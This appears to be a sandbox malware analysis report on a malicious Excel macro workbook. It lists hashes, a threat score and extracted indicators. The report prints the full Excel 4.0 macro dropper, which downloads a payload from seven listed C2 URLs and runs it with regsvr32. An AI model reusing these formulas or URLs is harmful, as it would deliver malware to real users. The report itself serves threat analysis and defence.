Overview

overview

10

Static

static

10

bd5a9253a6...1.xlsm

windows7-x64

10

bd5a9253a6...1.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    bd5a9253a60ebad745aae1e8435f003fc257cb6e0b480fe58d3a29dfb3864731

  • Size

    38KB

  • Sample

    241121-am4dwsxcrr

  • MD5

    6f2ecd6088024b3240b3d0e2635d7f7a

  • SHA1

    88025bb96e4a4120f06d6413b11473e566553dbd

  • SHA256

    bd5a9253a60ebad745aae1e8435f003fc257cb6e0b480fe58d3a29dfb3864731

  • SHA512

    833a953285fc287d2a3b224edbf33707866f3985f207f2436ecf6363076bfd6d6a11fe690f3f81b498def309820f0b836e383e331f8d3095a137c04cb886037f

  • SSDEEP

    768:mdUCR8xZ5jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIy5:u5wXOZZ1ZYpoQ/pMAeVIyMId

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://ausnz.net/2010wc/RhAYVPNypjphNNk6J/

https://belisip.net/libs/Swift-5.1.0/F5XU7EuPePQ/

https://blog.centerking.top/wp-includes/WEIuPafz0bS/

https://edu-media.cn/wp-admin/TOu/

https://ppiabanyuwangi.or.id/lulu-1937/daURDNUyso/

https://lydt.cc/wp-includes/jprpcO8U/

https://acerestoration.co.za/wp-admin/gJqMBYhQHYsDE/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ausnz.net/2010wc/RhAYVPNypjphNNk6J/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://belisip.net/libs/Swift-5.1.0/F5XU7EuPePQ/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://blog.centerking.top/wp-includes/WEIuPafz0bS/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://edu-media.cn/wp-admin/TOu/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ppiabanyuwangi.or.id/lulu-1937/daURDNUyso/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lydt.cc/wp-includes/jprpcO8U/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://acerestoration.co.za/wp-admin/gJqMBYhQHYsDE/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://ausnz.net/2010wc/RhAYVPNypjphNNk6J/
xlm40.dropper

https://belisip.net/libs/Swift-5.1.0/F5XU7EuPePQ/
xlm40.dropper

https://blog.centerking.top/wp-includes/WEIuPafz0bS/
xlm40.dropper

https://edu-media.cn/wp-admin/TOu/
xlm40.dropper

https://ppiabanyuwangi.or.id/lulu-1937/daURDNUyso/

Targets

    • Target

      bd5a9253a60ebad745aae1e8435f003fc257cb6e0b480fe58d3a29dfb3864731

    • Size

      38KB

    • MD5

      6f2ecd6088024b3240b3d0e2635d7f7a

    • SHA1

      88025bb96e4a4120f06d6413b11473e566553dbd

    • SHA256

      bd5a9253a60ebad745aae1e8435f003fc257cb6e0b480fe58d3a29dfb3864731

    • SHA512

      833a953285fc287d2a3b224edbf33707866f3985f207f2436ecf6363076bfd6d6a11fe690f3f81b498def309820f0b836e383e331f8d3095a137c04cb886037f

    • SSDEEP

      768:mdUCR8xZ5jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIy5:u5wXOZZ1ZYpoQ/pMAeVIyMId

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks